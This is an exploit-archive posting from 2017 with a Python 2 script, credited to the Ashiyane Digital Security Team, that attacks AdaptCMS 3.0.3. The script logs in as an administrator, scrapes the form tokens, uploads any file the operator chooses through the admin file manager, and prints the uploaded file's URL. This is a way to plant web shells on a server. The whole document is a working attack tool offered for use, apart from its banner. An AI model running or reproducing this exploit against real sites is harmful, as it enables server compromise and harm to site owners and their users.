Adapt CMS 3.0.3 File Upload
Posted on 31 January 2017
#!usr/bin/python """ | Exploit Title: Adapt Cms Arbitrary File Upload | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://www.adaptcms.com/ | | Download Link : http://www.adaptcms.com/downloads/latest_adaptcms.zip | | Tested Version : AdaptCMS 3.0.3 | | Tested on: Windows 7 / Mozilla Firefox | | Date: 2017-01-22 """ import requests,os,sys from bs4 import BeautifulSoup error="" def banner_print(error): banner=""" _______________________________________________________________________________________ _ _ _____ _ _ _ _ / | | (_) | __ (_) (_) | | | / ___| |__ _ _ _ __ _ _ __ ___ | | | |_ __ _ _| |_ __ _| | / / / __| '_ | | | | |/ _` | '_ / _ | | | | |/ _` | | __/ _` | | / ____ \__ | | | | |_| | (_| | | | | __/ | |__| | | (_| | | || (_| | | /_/ \_\___/_| |_|_|\__, |\__,_|_| |_|\___| |_____/|_|\__, |_|\__\__,_|_| __/ | __/ | |___/ |___/ _____ _ _ _______ / ____| (_) | |__ __| | (___ ___ ___ _ _ _ __ _| |_ _ _ | | ___ __ _ _ __ ___ \___ / _ / __| | | | '__| | __| | | | | |/ _ / _` | '_ ` _ ____) | __/ (__| |_| | | | | |_| |_| | | | __/ (_| | | | | | | |_____/ \___|\___|\__,_|_| |_|\__|\__, | |_|\___|\__,_|_| |_| |_| __/ | |___/ / _._|_ _ _| |_ / _ _ . _ _ |_ _|_ // | | | (/_(_| |_)/ /~~| | ||| .(_|| | | / _| | ____________________________________________________________________________________ %s Usage : python exploit.py site username_of_admin password_of_admin example : python exploit.py http://example.com admin 12345 """%(error) print banner banner_print(error) http=requests.session() class adapt_exploit: def __init__(self,url,user,passwd,file): self.url=url self.user=user self.passwd=passwd self.file=file def login(self): req=http.get(url+'/login') soup=BeautifulSoup(req.content,"html.parser") token1=soup.find_all('input',{'type':'hidden','name':'data[_Token][key]'})[0].get('value') token2=soup.find_all('input',{'type':'hidden','name':'data[_Token][fields]'})[1].get('value') print ' [+] The token for login was received successfully. ' data={'_method':'POST', 'data[_Token][key]':token1, 'data[User][username]':self.user, 'data[User][password]':self.passwd, 'data[_Token][fields]':token2} req=http.post(url+'/login',data=data) if 'success' in req.content.lower(): print '[+] Login success ' else: print '[!] Login Failed ' exit() def upload(self): req=http.get(url+'/admin/files/add') soup=BeautifulSoup(req.content,"html.parser") token1=soup.find('input',{'type':'hidden','name':'data[_Token][key]'}).get('value') token2=soup.find('input',{'type':'hidden','name':'data[_Token][fields]'}).get('value') print '[+] The token for login was received successfully. ' path=raw_input('Please enter path file that you want upload ... ') path=path.replace('"','') path=path.replace(''','') f=open(path,'rb') file= {'data[File][filename]' : f} data={'_method':'POST', 'data[_Token][key]':token1, 'data[_Token][fields]':token2, 'data[File][type]':'upload', 'data[File][0][random_filename]':'0' } req=http.post(url+'/admin/files/add',data=data,files=file) check=http.get('%s/uploads/'%(url)) file_name=os.path.basename(f.name).replace(' ','_') if file_name in check.content: print "[+] File upload was successful " print "URL Of File : %s/upload/%s"%(url,file_name) else: print " [-] Failed to upload file " try : url=sys.argv[1] user=sys.argv[2] passwd=sys.argv[3] expl=adapt_exploit(url,user,passwd,file) expl.login() expl.upload() except IndexError as e: if 'nt' in os.name : os.system('cls') else: os.system('clear') error="Invalid Usage !" banner_print(error) except Exception as e: print "oops !!! Some Thing is Wrong :(( " print str(e)
